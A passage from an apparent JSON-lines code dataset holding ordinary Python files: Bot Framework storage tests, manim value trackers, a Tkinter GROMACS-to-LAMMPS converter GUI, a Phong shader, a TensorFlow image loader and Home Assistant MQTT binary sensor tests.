update_poco_store_item[\"count\"] += 1\n\n await storage.write(loaded_store_items)\n\n reloaded_store_items = await storage.read(loaded_store_items.keys())\n\n reloaded_update_poco_item = reloaded_store_items[\"pocoItem\"]\n reloaded_update_poco_store_item = reloaded_store_items[\"pocoStoreItem\"]\n\n assert reloaded_update_poco_item[\"count\"] == 2\n assert reloaded_update_poco_store_item[\"count\"] == 2\n\n # Write with old e_tag should succeed for non-storeItem\n update_poco_item[\"count\"] = 123\n await storage.write({\"pocoItem\": update_poco_item})\n\n # Write with old eTag should FAIL for storeItem\n update_poco_store_item[\"count\"] = 123\n\n \"\"\"\n This assert exists in the other SDKs but can't in python, currently\n due to using \"e_tag: *\" above (see comment near the top of this file for details).\n\n with pytest.raises(Exception) as err:\n await storage.write({\"pocoStoreItem\": update_poco_store_item})\n assert err.value is not None\n \"\"\"\n\n reloaded_store_items2 = await storage.read([\"pocoItem\", \"pocoStoreItem\"])\n\n reloaded_poco_item2 = reloaded_store_items2[\"pocoItem\"]\n reloaded_poco_item2[\"e_tag\"] = None\n reloaded_poco_store_item2 = reloaded_store_items2[\"pocoStoreItem\"]\n\n assert reloaded_poco_item2[\"count\"] == 123\n assert reloaded_poco_store_item2[\"count\"] == 2\n\n # write with wildcard etag should work\n reloaded_poco_item2[\"count\"] = 100\n reloaded_poco_store_item2[\"count\"] = 100\n reloaded_poco_store_item2[\"e_tag\"] = \"*\"\n\n wildcard_etag_dict = {\n \"pocoItem\": reloaded_poco_item2,\n \"pocoStoreItem\": reloaded_poco_store_item2,\n }\n\n await storage.write(wildcard_etag_dict)\n\n reloaded_store_items3 = await storage.read([\"pocoItem\", \"pocoStoreItem\"])\n\n assert reloaded_store_items3[\"pocoItem\"][\"count\"] == 100\n assert reloaded_store_items3[\"pocoStoreItem\"][\"count\"] == 100\n\n # Write with empty etag should not work\n reloaded_store_items4 = await storage.read([\"pocoStoreItem\"])\n reloaded_store_item4 = reloaded_store_items4[\"pocoStoreItem\"]\n\n assert reloaded_store_item4 is not None\n\n reloaded_store_item4[\"e_tag\"] = \"\"\n dict2 = {\"pocoStoreItem\": reloaded_store_item4}\n\n with pytest.raises(Exception) as err:\n await storage.write(dict2)\n assert err.value is not None\n\n final_store_items = await storage.read([\"pocoItem\", \"pocoStoreItem\"])\n assert final_store_items[\"pocoItem\"][\"count\"] == 100\n assert final_store_items[\"pocoStoreItem\"][\"count\"] == 100\n\n return True\n\n @staticmethod\n async def delete_object(storage) -> bool:\n store_items = {\"delete1\": {\"id\": 1, \"count\": 1, \"e_tag\": \"*\"}}\n\n await storage.write(store_items)\n\n read_store_items = await storage.read([\"delete1\"])\n\n assert read_store_items[\"delete1\"][\"e_tag\"]\n assert read_store_items[\"delete1\"][\"count\"] == 1\n\n await storage.delete([\"delete1\"])\n\n reloaded_store_items = await storage.read([\"delete1\"])\n\n assert reloaded_store_items.get(\"delete1\", None) is None\n\n return True\n\n @staticmethod\n async def delete_unknown_object(storage) -> bool:\n # noinspection PyBroadException\n try:\n await storage.delete([\"unknown_key\"])\n except:\n pytest.fail(\"Should not raise\")\n\n return True\n\n @staticmethod\n async def perform_batch_operations(storage) -> bool:\n await storage.write(\n {\"batch1\": {\"count\": 10}, \"batch2\": {\"count\": 20}, \"batch3\": {\"count\": 30},}\n )\n\n result = await storage.read([\"batch1\", \"batch2\", \"batch3\"])\n\n assert result.get(\"batch1\", None) is not 
None\n assert result.get(\"batch2\", None) is not None\n assert result.get(\"batch3\", None) is not None\n assert result[\"batch1\"][\"count\"] == 10\n assert result[\"batch2\"][\"count\"] == 20\n assert result[\"batch3\"][\"count\"] == 30\n \"\"\"\n If decided to validate e_tag integrity aagain, uncomment this code\n assert result[\"batch1\"].get(\"e_tag\", None) is not None\n assert result[\"batch2\"].get(\"e_tag\", None) is not None\n assert result[\"batch3\"].get(\"e_tag\", None) is not None\n \"\"\"\n\n await storage.delete([\"batch1\", \"batch2\", \"batch3\"])\n\n result = await storage.read([\"batch1\", \"batch2\", \"batch3\"])\n\n assert result.get(\"batch1\", None) is None\n assert result.get(\"batch2\", None) is None\n assert result.get(\"batch3\", None) is None\n\n return True\n\n @staticmethod\n async def proceeds_through_waterfall(storage) -> bool:\n convo_state = ConversationState(storage)\n\n dialog_state = convo_state.create_property(\"dialogState\")\n dialogs = DialogSet(dialog_state)\n\n async def exec_test(turn_context: TurnContext) -> None:\n dialog_context = await dialogs.create_context(turn_context)\n\n await dialog_context.continue_dialog()\n if not turn_context.responded:\n await dialog_context.begin_dialog(WaterfallDialog.__name__)\n await convo_state.save_changes(turn_context)\n\n adapter = TestAdapter(exec_test)\n\n async def prompt_validator(prompt_context: PromptValidatorContext):\n result = prompt_context.recognized.value\n if len(result) > 3:\n succeeded_message = MessageFactory.text(\n f\"You got it at the {prompt_context.options.number_of_attempts}rd try!\"\n )\n await prompt_context.context.send_activity(succeeded_message)\n return True\n\n reply = MessageFactory.text(\n f\"Please send a name that is longer than 3 characters. {prompt_context.options.number_of_attempts}\"\n )\n await prompt_context.context.send_activity(reply)\n return False\n\n async def step_1(step_context: WaterfallStepContext) -> DialogTurnStatus:\n assert isinstance(step_context.active_dialog.state[\"stepIndex\"], int)\n await step_context.context.send_activity(\"step1\")\n return Dialog.end_of_turn\n\n async def step_2(step_context: WaterfallStepContext) -> None:\n assert isinstance(step_context.active_dialog.state[\"stepIndex\"], int)\n await step_context.prompt(\n TextPrompt.__name__,\n PromptOptions(prompt=MessageFactory.text(\"Please type your name\")),\n )\n\n async def step_3(step_context: WaterfallStepContext) -> DialogTurnStatus:\n assert isinstance(step_context.active_dialog.state[\"stepIndex\"], int)\n await step_context.context.send_activity(\"step3\")\n return Dialog.end_of_turn\n\n steps = [step_1, step_2, step_3]\n\n dialogs.add(WaterfallDialog(WaterfallDialog.__name__, steps))\n\n dialogs.add(TextPrompt(TextPrompt.__name__, prompt_validator))\n\n step1 = await adapter.send(\"hello\")\n step2 = await step1.assert_reply(\"step1\")\n step3 = await step2.send(\"hello\")\n step4 = await step3.assert_reply(\"Please type your name\") # None\n step5 = await step4.send(\"hi\")\n step6 = await step5.assert_reply(\n \"Please send a name that is longer than 3 characters. 0\"\n )\n step7 = await step6.send(\"hi\")\n step8 = await step7.assert_reply(\n \"Please send a name that is longer than 3 characters. 1\"\n )\n step9 = await step8.send(\"hi\")\n step10 = await step9.assert_reply(\n \"Please send a name that is longer than 3 characters. 
2\"\n )\n step11 = await step10.send(\"Kyle\")\n step12 = await step11.assert_reply(\"You got it at the 3rd try!\")\n await step12.assert_reply(\"step3\")\n\n return True\n"} {"ext": "py", "sha": "1a307dec7a41e764ad9211995da38d2730e41557", "content": "import numpy as np\nfrom manimlib.mobject.mobject import Mobject\n\n\nclass ValueTracker(Mobject):\n \"\"\"\n Note meant to be displayed. Instead the position encodes some\n number, often one which another animation or continual_animation\n uses for its update function, and by treating it as a mobject it can\n still be animated and manipulated just like anything else.\n \"\"\"\n\n def __init__(self, value=0, **kwargs):\n Mobject.__init__(self, **kwargs)\n self.points = np.zeros((1, 3))\n self.set_value(value)\n\n def get_value(self):\n return self.points[0, 0]\n\n def set_value(self, value):\n self.points[0, 0] = value\n return self\n\n def increment_value(self, d_value):\n self.set_value(self.get_value() + d_value)\n\n\nclass ExponentialValueTracker(ValueTracker):\n \"\"\"\n Operates just like ValueTracker, except it encodes the value as the\n exponential of a position coordinate, which changes how interpolation\n behaves\n \"\"\"\n\n def get_value(self):\n return np.exp(ValueTracker.get_value(self))\n\n def set_value(self, value):\n return ValueTracker.set_value(self, np.log(value))\n\n\nclass ComplexValueTracker(ValueTracker):\n def get_value(self):\n return complex(*self.points[0, :2])\n\n def set_value(self, z):\n z = complex(z)\n self.points[0, :2] = (z.real, z.imag)\n return self\n"} {"ext": "py", "sha": "1a3081112dd6341e71ab42275305611cea2b5b08", "content": "#!/usr/bin/python\n# By Hernan Chavez Thielemann\n__author__ = 'Hernan Chavez Thielemann '\n# checked ok 30/04/2018 \n\n#------------------------------------------------------\n#/// Packages and globals definitions are here ///\n#------------------------------------------------------\nfrom os.path import dirname, realpath\nfrom sys import exit\n\nfrom Tkinter import Tk, Frame, Label, TclError, PhotoImage\n\nfrom conversion_gui import Conversion\nfrom script_gui import Script_GUI\nfrom run_gui import Run_GUI\n\nfrom popup import AboutPopUp\nfrom tk_lib import createmenubar\n\nfrom lib.misc.warn import wrg_3\nfrom lib.misc.file import run_command\nfrom lib.misc.version import __version__\n\n#------------------------------------------------------\n'''/////////////// Class /////////////'''\n#------------------------------------------------------\n\nclass Gro2Lam_GUI(Frame):\n ''' Graphic User Interface '''\n def __init__(self, master=None, test = False):\n Frame.__init__(self, master)\n _ver= __version__.split()\n self.master.title(\" \"*5+\"{} {}\".format(_ver[0],_ver[2]))#.master\n \n self.pack() # ... why I'm packing here?? 
coords?\n self.test = test\n \n # images storaging\n dir_path = dirname( realpath( __file__))\n self.img = dict()\n self.img['logo'] = PhotoImage( file = dir_path + \"/img/logo.ppm\")\n self.img['help'] = PhotoImage( file = dir_path + \"/img/help.ppm\")\n self.img['file'] = PhotoImage( file = dir_path + \"/img/file.ppm\")\n self.img['gear'] = PhotoImage( file = dir_path + \"/img/gear.ppm\")\n \n # body init\n self.prevailing_body = 0\n self.body = None\n self.MAINVERTEX = [ 0, 0, 0, 0, 0, 0]\n \n # Conversion gathered data container\n self._convert_ = {'setup' : [], 'solvation': []}\n self._convertdata_= None\n # Script part\n self._script_ = {'mainpage' : [], 'advanced': [], 'restrain': []}\n \n self.createmainPennon()\n \n\n def createmainPennon(self):\n '''Self explanatory neated with subroutines to make it more readable'''\n \n row = Frame(self,bg = \"white\")\n Label( row, bg = \"white\",\n image = self.img['logo']).pack( side= 'left', padx=25)\n row.pack(side=\"top\", fill='x', padx=1)\n \n self.swapbody(1)\n\n def swapbody(self, _pbody_):# checked ok 16/09 -----------WF\n ''' Deletes and clean the last generated body\n maybe lacks a real body destroyer?? but works fine with\n this, because it is just a \"small\" overlapping I gess\n '''\n \n if self.prevailing_body <> _pbody_:\n if self.body == None:\n self.body = self.create_conversion_gui()\n \n else:\n self.body.destroy()\n \n if _pbody_==1:\n print 'Swapping to gro2lam converter GUI'\n self.body = self.create_conversion_gui()\n \n elif _pbody_==2:\n print 'Swapping to input script generator GUI'\n self.body = self.create_script_gui()\n \n elif _pbody_==3:\n print 'Swapping to run script GUI'\n self.body = self.create_run_gui()\n \n else:\n exit('Wuut...')\n \n self.prevailing_body = _pbody_\n \n self.body.createWidgets()\n self.body.b1.focus()\n self.master.bind('', self.b1_hook )\n self.master.bind('', self.quit_hook )\n self.body.pack(side='top', fill='x')\n\n def b1_hook(self, event=None):\n self.body.b1.invoke()\n \n def quit_hook(self, event=None):\n self.body.quit()\n \n def swap_hook(self):\n _l_ = [1,2,3]\n b = _l_[_l_.index(self.prevailing_body)-2]\n self.swapbody(b)\n \n def create_conversion_gui(self):\n 'Hook to create conversion gui'\n return Conversion(self)# Hook\n \n def create_script_gui(self):\n 'Hook to create script gui'\n return Script_GUI(self)# Hook\n \n def create_run_gui(self):\n 'Hook to create run gui'\n return Run_GUI(self)# Hook\n\n#------------------------------------------------------\n'''/////////////// Sub routines /////////////'''\n#------------------------------------------------------\n\ndef launch_gui( started = False):\n ''' launcher \n Main GUI constructor\n '''\n \n print wrg_3('Before you start, make sure there are no comments',\n '(;) in the middle of a line of the input GROMACS files.',\n 'Data after this symbol are not taken into account.')\n \n MasterWin = Tk()\n prompt = Gro2Lam_GUI( master= MasterWin, test = started)# xl_App\n \n # Top main pennon menu bar definition\n \n entry_list_of_dicts = [{ 'title' : 'File',\n 'cascade' : (('Quit' ,MasterWin.quit), ) },\n { 'title' : 'Data File Creation',\n 'title_com' : (prompt.swapbody , 1)},\n { 'title' : 'Input File Creation',\n 'title_com' : (prompt.swapbody , 2)},\n { 'title' : 'Run',\n 'title_com' : (prompt.swapbody , 3)},\n { 'titlei' : prompt.img['help'], \n 'cascade' : (('User manual' , showuserman),\n ('About' , launch_about, prompt),)}\n ]\n createmenubar(MasterWin, entry_list_of_dicts)\n \n w = 460\n h = 570\n # get screen width 
and height\n ws = MasterWin.winfo_screenwidth() # width of the screen\n hs = MasterWin.winfo_screenheight() # height of the screen\n # calculate x and y coordinates for the Tk root window\n x = (ws/6) - (w/2)\n if x <100:\n x = 100\n y = (hs/3) - (h/2)\n if y< 40:\n y = 40\n \n prompt.MAINVERTEX = [ws, hs, w, h, x, y]\n #print MAINVERTEX\n # set the dimensions of the screen \n # and where it is placed\n MasterWin.geometry('{:d}x{:d}+{:d}+{:d}'.format( *prompt.MAINVERTEX[2:]))\n \n \n prompt.mainloop()\n \n try:\n MasterWin.destroy()\n except TclError:\n pass\n\ndef showlicence():\n \n print 'Opening licence file'\n command = 'gedit ./lib/docs/COPYING'#\n run_command(command)\n\ndef launch_about( _master_window_):\n \n print 'Launching about'\n \n title_txt = ' '*17+'ABOUT GROTOLAM'\n \n pop = AboutPopUp(master = _master_window_,\n title = title_txt,\n licence = showlicence\n )\n\ndef showuserman():\n \n print 'Opening readme file'\n command = 'gedit ./lib/docs/README.md'#\n run_command(command)\n\n# vim:tw=80\n"} {"ext": "py", "sha": "1a308167840becc98449ea5d7c892e04e39b37c3", "content": "\"\"\"\nPhong Material\n\nFor phong shading\n\"\"\"\nfrom .material import Material\nfrom ..math import Vec3, Ray, HitRecord, dot3, reflect3, normalize3, clamp3\nfrom ..camera import Camera\n\n\nclass PhongMaterial(Material):\n\n \"\"\"Base Material Class\"\"\"\n\n def __init__(self, color: Vec3 = Vec3(1.,1.,1.), shininess: float = 10.0, reflectivity: float = 0.0, refraction: float = 1.0):\n Material.__init__(self, color, shininess, reflectivity, refraction)\n\n def shade(self, camera: Camera, ray: Ray, hitrecord: HitRecord, lights: list) -> Vec3:\n \"\"\"\n Shade method: Phong\n\n phong shader\n \"\"\"\n colorsum = Vec3(0.,0.,0.)\n\n if len(lights)>0:\n for light in lights:\n N = hitrecord.normal_g\n L = normalize3(hitrecord.point - light.position)\n E = normalize3(camera.position - hitrecord.point)\n R = normalize3(-reflect3(L, N))\n diffuse = max(1. 
- dot3(N, L), 0.0)\n specular = pow(max(dot3(R, E), 0.0), 0.3 * self.shininess)\n color = self.color * 0.5 * (diffuse + specular) * hitrecord.color\n colorsum += color\n colorsum /= len(lights)\n colorsum = clamp3(colorsum, Vec3(0.,0.,0.), Vec3(1.,1.,1.))\n else:\n # no light in scene, use material color\n colorsum = self.color * hitrecord.color\n\n return colorsum\n\n"} {"ext": "py", "sha": "1a30826f7435bcf292804ed9da94487d44c58d5a", "content": "import numpy as np\nimport os\nimport pickle\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom skimage.transform import rotate, resize\nfrom skimage import exposure\nimport skimage.io as io\n\n\n\nfrom config import FLAGS\n\n\ndef load_facegreyreduxshuffled_set(batch_size, is_training=True):\n path = os.path.join('data', 'facegreyredux')\n if is_training:\n fd = open(os.path.join(path, 'facegreyredux'), 'rb')\n # loaded = np.fromfile(file=fd, dtype=np.uint8)\n loaded = np.asarray(pickle.load(fd))\n trainX = loaded.reshape((50000, 28, 28, 1)).astype(np.float32)\n\n fd = open(os.path.join(path, 'facegreyreduxcat'), 'rb')\n # loaded = np.fromfile(file=fd, dtype=np.uint8)\n loaded = np.asarray(pickle.load(fd))\n trainY = loaded.reshape((50000)).astype(np.int32)\n\n data_set = list(zip(trainX,trainY))\n np.random.shuffle(data_set)\n trainX, trainY = list(zip(*data_set))\n trainX = np.asarray(trainX).reshape((50000, 28, 28, 1)).astype(np.float32)\n trainY = np.asarray(trainY).reshape((50000)).astype(np.int32)\n trX = trainX[:40000] / 255.\n trY = trainY[:40000]\n\n valX = trainX[40000:, ] / 255.\n valY = trainY[40000:]\n\n num_tr_batch = 40000 // batch_size\n num_val_batch = 10000 // batch_size\n\n return trX, trY, num_tr_batch, valX, valY, num_val_batch\n else:\n if (FLAGS.flickr):\n fd = open(os.path.join(path, 'flickrsetgreyredux'), 'rb')\n loaded = np.asarray(pickle.load(fd))\n trainX = loaded.reshape((10000, 28, 28)).astype(np.float32) / 255.\n else:\n fd = open(os.path.join(path, 'facegreyreduxeval'), 'rb')\n loaded = np.asarray(pickle.load(fd))\n trainX = loaded.reshape((10000, 28, 28)).astype(np.float32) / 255.\n\n fd = open(os.path.join(path, 'facegreyreduxevalcat'), 'rb')\n loaded = np.asarray(pickle.load(fd))\n trainY = loaded.reshape((10000)).astype(np.int32)\n\n rotatedlist = []\n for image in trainX:\n image = rotate(image, FLAGS.rotation, preserve_range=True)\n if(FLAGS.mooney):\n v_min, v_max = np.percentile(image, (49.99999999, 51))\n image = exposure.rescale_intensity(image, in_range=(v_min, v_max))\n rotatedlist.append(image)\n if(len(rotatedlist)==1000):\n I = resize(image.reshape(28, 28), (128, 128))\n io.imsave(\"rotate\" + str(FLAGS.rotation) + \"example.jpg\", I, cmap='gray')\n rotatedlist = np.asarray(rotatedlist)\n plt.imshow(rotatedlist[33], cmap='gray')\n plt.show()\n trainX = rotatedlist.reshape((10000, 28, 28, 1)).astype(np.float32)\n\n return trainX, trainY\n\n\ndef create_inputs_norb(path, is_train: bool):\n \"\"\"Get a batch from the input pipeline.\n\n Author:\n Ashley Gritzman 15/11/2018\n Args:\n is_train:\n Returns:\n img, lab:\n \"\"\"\n if is_train:\n trX, trY, num_tr_batch, valX, valY, num_val_batch = load_facegreyreduxshuffled_set(FLAGS.batch_size, is_train)\n else:\n trX, trY = load_facegreyreduxshuffled_set(FLAGS.batch_size, is_train)\n\n def generator():\n for e1, e2 in zip(trX, trY):\n yield e1, e2\n\n capacity = 2000 + 3 * FLAGS.batch_size\n # Create batched dataset\n tf_dataset = tf.data.Dataset.from_generator(generator, output_types=(tf.float32, tf.int32), 
output_shapes=(tf.TensorShape(list(trX[0].shape)), ())).repeat().shuffle(capacity).batch(batch_size=FLAGS.batch_size, drop_remainder=True).prefetch(1)\n\n # dataset = input_fn(path, is_train)\n\n # Create one-shot iterator\n iterator = tf.compat.v1.data.make_one_shot_iterator(tf_dataset)\n\n img, lab = iterator.get_next()\n\n output_dict = {'image': img,\n 'label': lab}\n\n return output_dict\n"} {"ext": "py", "sha": "1a30836d074dd9e595ba028a8883a2a758ec1d47", "content": "\"\"\"The tests for the MQTT binary sensor platform.\"\"\"\nimport copy\nfrom datetime import datetime, timedelta\nimport json\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom homeassistant.components import binary_sensor\nfrom homeassistant.const import (\n EVENT_STATE_CHANGED,\n STATE_OFF,\n STATE_ON,\n STATE_UNAVAILABLE,\n STATE_UNKNOWN,\n)\nimport homeassistant.core as ha\nfrom homeassistant.setup import async_setup_component\nimport homeassistant.util.dt as dt_util\n\nfrom .test_common import (\n help_test_availability_when_connection_lost,\n help_test_availability_without_topic,\n help_test_custom_availability_payload,\n help_test_default_availability_payload,\n help_test_discovery_broken,\n help_test_discovery_removal,\n help_test_discovery_update,\n help_test_discovery_update_attr,\n help_test_discovery_update_unchanged,\n help_test_entity_debug_info_message,\n help_test_entity_device_info_remove,\n help_test_entity_device_info_update,\n help_test_entity_device_info_with_connection,\n help_test_entity_device_info_with_identifier,\n help_test_entity_id_update_discovery_update,\n help_test_entity_id_update_subscriptions,\n help_test_setting_attribute_via_mqtt_json_message,\n help_test_setting_attribute_with_template,\n help_test_unique_id,\n help_test_update_with_json_attrs_bad_JSON,\n help_test_update_with_json_attrs_not_dict,\n)\n\nfrom tests.common import async_fire_mqtt_message, async_fire_time_changed\n\nDEFAULT_CONFIG = {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n }\n}\n\n\nasync def test_setting_sensor_value_expires_availability_topic(hass, mqtt_mock, caplog):\n \"\"\"Test the expiration of the value.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"expire_after\": 4,\n \"force_update\": True,\n \"availability_topic\": \"availability-topic\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n async_fire_mqtt_message(hass, \"availability-topic\", \"online\")\n\n # State should be unavailable since expire_after is defined and > 0\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n await expires_helper(hass, mqtt_mock, caplog)\n\n\nasync def test_setting_sensor_value_expires(hass, mqtt_mock, caplog):\n \"\"\"Test the expiration of the value.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"expire_after\": 4,\n \"force_update\": True,\n }\n },\n )\n await hass.async_block_till_done()\n\n # State should be unavailable since expire_after is defined and > 0\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n await expires_helper(hass, mqtt_mock, caplog)\n\n\nasync def 
expires_helper(hass, mqtt_mock, caplog):\n \"\"\"Run the basic expiry code.\"\"\"\n realnow = dt_util.utcnow()\n now = datetime(realnow.year + 1, 1, 1, 1, tzinfo=dt_util.UTC)\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n\n # Value was set correctly.\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Time jump +3s\n now = now + timedelta(seconds=3)\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # Value is not yet expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Next message resets timer\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n async_fire_mqtt_message(hass, \"test-topic\", \"OFF\")\n await hass.async_block_till_done()\n\n # Value was updated correctly.\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n # Time jump +3s\n now = now + timedelta(seconds=3)\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # Value is not yet expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n # Time jump +2s\n now = now + timedelta(seconds=2)\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # Value is expired now\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n\nasync def test_expiration_on_discovery_and_discovery_update_of_binary_sensor(\n hass, mqtt_mock, caplog\n):\n \"\"\"Test that binary_sensor with expire_after set behaves correctly on discovery and discovery update.\"\"\"\n config = {\n \"name\": \"Test\",\n \"state_topic\": \"test-topic\",\n \"expire_after\": 4,\n \"force_update\": True,\n }\n\n config_msg = json.dumps(config)\n\n # Set time and publish config message to create binary_sensor via discovery with 4 s expiry\n realnow = dt_util.utcnow()\n now = datetime(realnow.year + 1, 1, 1, 1, tzinfo=dt_util.UTC)\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n async_fire_mqtt_message(\n hass, \"homeassistant/binary_sensor/bla/config\", config_msg\n )\n await hass.async_block_till_done()\n\n # Test that binary_sensor is not available\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n # Publish state message\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n await hass.async_block_till_done()\n\n # Test that binary_sensor has correct state\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Advance +3 seconds\n now = now + timedelta(seconds=3)\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # binary_sensor is not yet expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Resend config message to update discovery\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n async_fire_mqtt_message(\n hass, \"homeassistant/binary_sensor/bla/config\", config_msg\n )\n await hass.async_block_till_done()\n\n # Test that 
binary_sensor has not expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n # Add +2 seconds\n now = now + timedelta(seconds=2)\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_time_changed(hass, now)\n await hass.async_block_till_done()\n\n # Test that binary_sensor has expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n # Resend config message to update discovery\n with patch((\"homeassistant.helpers.event.dt_util.utcnow\"), return_value=now):\n async_fire_mqtt_message(\n hass, \"homeassistant/binary_sensor/bla/config\", config_msg\n )\n await hass.async_block_till_done()\n\n # Test that binary_sensor is still expired\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNAVAILABLE\n\n\nasync def test_setting_sensor_value_via_mqtt_message(hass, mqtt_mock):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", \"OFF\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n\nasync def test_invalid_sensor_value_via_mqtt_message(hass, mqtt_mock, caplog):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"0N\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n assert \"No matching payload found for entity\" in caplog.text\n caplog.clear()\n assert \"No matching payload found for entity\" not in caplog.text\n\n async_fire_mqtt_message(hass, \"test-topic\", \"ON\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", \"0FF\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n assert \"No matching payload found for entity\" in caplog.text\n\n\nasync def test_setting_sensor_value_via_mqtt_message_and_template(hass, mqtt_mock):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"value_template\": '{%if is_state(entity_id,\"on\")-%}OFF'\n \"{%-else-%}ON{%-endif%}\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state 
== STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", \"\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n\nasync def test_setting_sensor_value_via_mqtt_message_and_template2(\n hass, mqtt_mock, caplog\n):\n \"\"\"Test the setting of the value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"value_template\": \"{{value | upper}}\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_UNKNOWN\n\n async_fire_mqtt_message(hass, \"test-topic\", \"on\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_ON\n\n async_fire_mqtt_message(hass, \"test-topic\", \"off\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n\n async_fire_mqtt_message(hass, \"test-topic\", \"illegal\")\n state = hass.states.get(\"binary_sensor.test\")\n assert state.state == STATE_OFF\n assert \"template output: 'ILLEGAL'\" in caplog.text\n\n\nasync def test_setting_sensor_value_via_mqtt_message_and_template_and_raw_state_encoding(\n hass, mqtt_mock, caplog\n):\n \"\"\"Test processing a raw value via MQTT.\"\"\"\n assert await async_setup_component(\n hass,\n binary_sensor.DOMAIN,\n {\n binary_sensor.DOMAIN: {\n \"platform\": \"mqtt\",\n \"name\": \"test\",\n \"encoding\": \"\",\n \"state_topic\": \"test-topic\",\n \"payload_on\": \"ON\",\n \"payload_off\": \"OFF\",\n \"value_template\": \"{%if value|unpack('b')-%}ON{%else%}OFF{%-endif-%}\",\n }\n },\n )\n await hass.async_block_till_done()\n\n state = hass.states.get(\"binary_sensor.test\")\n assert 